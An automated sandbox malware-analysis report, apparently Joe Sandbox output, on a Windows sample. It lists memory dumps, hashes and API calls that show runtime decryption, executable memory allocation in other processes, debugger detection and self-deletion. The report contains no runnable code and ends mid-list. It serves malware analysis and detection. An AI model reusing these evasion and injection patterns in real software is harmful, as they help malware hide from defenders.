                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 21b421a46d608847a989b71efe70fa8af0b45b4d7cc2630005e6d5270740cc3c
                                                                                                                                                                                                                                                          • Instruction ID: ed7122537460deab31939f0337519f955feef297cd8f28b739735d6036c10f4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21b421a46d608847a989b71efe70fa8af0b45b4d7cc2630005e6d5270740cc3c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E0653D10522377DA2166659C19BEF3F88BB827A0F550250AC55A61DBCF10DC1091E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00FE6C42,00000000,00000000,?,00000000,00000001,00000000,?,00FE6670,00000000,00000000,?), ref: 00FE6B9E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742772659.0000000000FE6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE6000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe6000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                          • Instruction ID: 80de360aba4edfdb7a85e9bdf2eebd7b525fcee006698a88556f6dd9b280d177
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9D05E36600228BBEB106E94DC02FA9B79CDF447A0F108026FE5C9B340DA72BE1087D4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 013F8D3F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 013F8D49
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,013FC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 013F8D78
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 013F8D99
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 013F8DB1
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 013F8DD5
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 013F8DF1
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 013F8DFE
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 013F8E08
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013F8E14
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8D30
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 013F8D68
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 129f585bb5113ea341d6a6b5dc71f5cdcce759cae847bbb41d1b388d080991cb
                                                                                                                                                                                                                                                          • Instruction ID: 22c58f77811adb29886b458ff24e88efe9275c3cbf5b1a37d14e269229936d5d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129f585bb5113ea341d6a6b5dc71f5cdcce759cae847bbb41d1b388d080991cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65312C75A80209FBEB24CFA8C989FEE7B79BB04704F10855DF705A6284C7B4D945CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,?,00000001,?,?,?,?), ref: 005043C8
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00504486
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateExitFileProcess
                                                                                                                                                                                                                                                          • String ID: 2$e$xnT$xnT$xnT$xnT$xnT$<
                                                                                                                                                                                                                                                          • API String ID: 2838702978-936793422
                                                                                                                                                                                                                                                          • Opcode ID: 652c0bcfea0ae73c0da3a8c616f1ded2cea85ebbfc62c88e944731e29840fd0e
                                                                                                                                                                                                                                                          • Instruction ID: 3b56d1575b37311e6381fce87df6e54accfe4e942db6576d1fca975bff159bf7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 652c0bcfea0ae73c0da3a8c616f1ded2cea85ebbfc62c88e944731e29840fd0e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2C109B9508300AFE304CF19E984A6BBBF9FB9A308F41452CF48997365D775AC18DB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 013F2564
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,?,00000000,00003000,00000040), ref: 013F2590
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 013F25B0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013F25CA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                          • Opcode ID: d0bb06b5577d32ea52c7c576069a7c627f81c7d43883ad81c8fea9b1f605f8d5
                                                                                                                                                                                                                                                          • Instruction ID: 3fbd92977ccdfcbfe0f1fe65a0579a029e0af60232168a7acdcfb0a27a4c82ae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0bb06b5577d32ea52c7c576069a7c627f81c7d43883ad81c8fea9b1f605f8d5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F510AB5E40209EFDB14CF94C895FAEB7B9FF48305F108548E615AB284D774EA41CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,?,?,?,?,?,00546E78,005046DE,?,?,?,00546E78,?), ref: 005039DD
                                                                                                                                                                                                                                                          • GetCurrentActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2,?,?), ref: 005039F2
                                                                                                                                                                                                                                                          • GetNamedPipeInfo.KERNEL32(?,?,?,-00546F61,?,?,?,?,?,00546E78,005046DE,?,?,?,00546E78,?), ref: 00503B0F
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2,?,?), ref: 00503B1E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$CurrentDeleteInfoModuleNameNamedPipe
                                                                                                                                                                                                                                                          • String ID: xnT$<
                                                                                                                                                                                                                                                          • API String ID: 3443511401-2457976334
                                                                                                                                                                                                                                                          • Opcode ID: bcc697034aadee0fba167753d02f52df80f00e0d2ad18b2c919e062dfe4dfc08
                                                                                                                                                                                                                                                          • Instruction ID: d45bf5483ba89f265ff489114c3a245494fd992fec3b5fb847738d5eee80b130
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcc697034aadee0fba167753d02f52df80f00e0d2ad18b2c919e062dfe4dfc08
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7C12679604701CFD314CF28D985BABB7E9FB99308F048A2DE48ACB251C771E949DB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetNamedPipeHandleStateA.KERNEL32(?,?,00000001,?,?,00000000,000B654C), ref: 0050477B
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 005047E8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitHandleNamedPipeStateThread
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 2345884422-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 6c6a6dc3aa017c0a5502d63ecd2924a0b76a2fdd7587ac0b5da6d4ea91a061af
                                                                                                                                                                                                                                                          • Instruction ID: e87320261b0942a41f0befdb7d1a52e4b2d5f04ae76ecf023902e4bc42a0df5a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c6a6dc3aa017c0a5502d63ecd2924a0b76a2fdd7587ac0b5da6d4ea91a061af
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FA169B6604201CFD354CF28D981B8BB7E5FB99308F094A79E189DB291D774E989CF81
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00501204: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 0050129B
                                                                                                                                                                                                                                                          • GetCurrentActCtx.KERNEL32(?,?,?,00546E78,?,005041FC,00546E78,?,?,?,?,?,?), ref: 00511CDE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocCurrentVirtual
                                                                                                                                                                                                                                                          • String ID: xnT$xnT
                                                                                                                                                                                                                                                          • API String ID: 2766526180-1598854230
                                                                                                                                                                                                                                                          • Opcode ID: 40230366005baa5dbcc197a1c7fa029d5b836f0ccd39ad38bf8123470167366b
                                                                                                                                                                                                                                                          • Instruction ID: 7dc6b6b606cfd63dc30b250fecf553849b3ba883b9d0fd972e6891275bc344a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40230366005baa5dbcc197a1c7fa029d5b836f0ccd39ad38bf8123470167366b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E861577A600201DFD750CF68D984B9A7BE8FB49304F0486B9E949DB256D730E949CB62
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetNamedPipeHandleStateA.KERNEL32(?,00000000,?,00000000,?,000304A7,?), ref: 00510FC7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HandleNamedPipeState
                                                                                                                                                                                                                                                          • String ID: xnT$xnT
                                                                                                                                                                                                                                                          • API String ID: 2980779144-1598854230
                                                                                                                                                                                                                                                          • Opcode ID: b73e863813638e936ea2bd1cf071a8178d4d9544b7c135f021e71aea66322f69
                                                                                                                                                                                                                                                          • Instruction ID: a1e5b11b48f21cf0fe0f6570d78bdf5b793f2c7b7dd96e5884b5e280dff3338e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b73e863813638e936ea2bd1cf071a8178d4d9544b7c135f021e71aea66322f69
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD712479600701DFD324CF28D984B97BBE9FB5A308F048A6DE49ACB255D770B859CB12
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,005100BA,?,?,?,?,?,?,000A3CE2,?,?), ref: 00503FEA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                                          • String ID: xnT$<
                                                                                                                                                                                                                                                          • API String ID: 1611563598-2457976334
                                                                                                                                                                                                                                                          • Opcode ID: a7dac859a231194bb9ab53aa1d8666d35064629c254c217065f1d486f039cb2b
                                                                                                                                                                                                                                                          • Instruction ID: 3dfd228b7e14e47f9d12d4117dd1837c9471b261b59474eef1570565c030bde6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7dac859a231194bb9ab53aa1d8666d35064629c254c217065f1d486f039cb2b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8713679600701CFD314CF38D984B97B7E8FB6A308F10896AE59ACB261D771A959CF42
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(FFFF85FD,?,?,00000001,?,?), ref: 00510670
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                          • String ID: @'Q$xnT
                                                                                                                                                                                                                                                          • API String ID: 2422867632-611822519
                                                                                                                                                                                                                                                          • Opcode ID: 20526972cee29cc7f9322453f1cbb081cd9fd97140380bfd2e813456d6e36441
                                                                                                                                                                                                                                                          • Instruction ID: 9e780f7911296fecfd77ff45d5b5da970585d8bd5d5a59f1171a9276a0d18734
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20526972cee29cc7f9322453f1cbb081cd9fd97140380bfd2e813456d6e36441
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF51E5392007018FD368CF29D980A97B7E5FB5A304F558A69E58ACB651CB70B889CB12
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0012A7FD), ref: 00510269
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                          • String ID: xnT$<
                                                                                                                                                                                                                                                          • API String ID: 2962429428-2457976334
                                                                                                                                                                                                                                                          • Opcode ID: 090a33e377f0574aec3011c08a213a31bc88a18c808e8f8bab4e4399f6763d0d
                                                                                                                                                                                                                                                          • Instruction ID: 8f5d6e903b0e980ef09735383e6de73d6ceed777f0b1da69b653ecaeeb78150d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090a33e377f0574aec3011c08a213a31bc88a18c808e8f8bab4e4399f6763d0d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9151893A200245DFD764CF28DD84BEB77E9FB9A308F044629E959CB351D770A958CB12
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0050655D
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00506567
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00506574
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 3729d612154e1d61ff6dea1110d97037c1fc7b26e85513d7162a21a7734be466
                                                                                                                                                                                                                                                          • Instruction ID: 454c7f94059a5ee4b51e69b58f4839e1d141710e11936cd5d5e24d787cc07a7f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3729d612154e1d61ff6dea1110d97037c1fc7b26e85513d7162a21a7734be466
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31B3749012299BCB21DF68DC897DDBBB8BF58310F5042DAE41CA7290EB709F958F45
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,00508946,00000003,0052D508,0000000C,00508A59,00000003,00000002,00000000,?,0050735E,00000003), ref: 00508991
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00508946,00000003,0052D508,0000000C,00508A59,00000003,00000002,00000000,?,0050735E,00000003), ref: 00508998
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 005089AA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
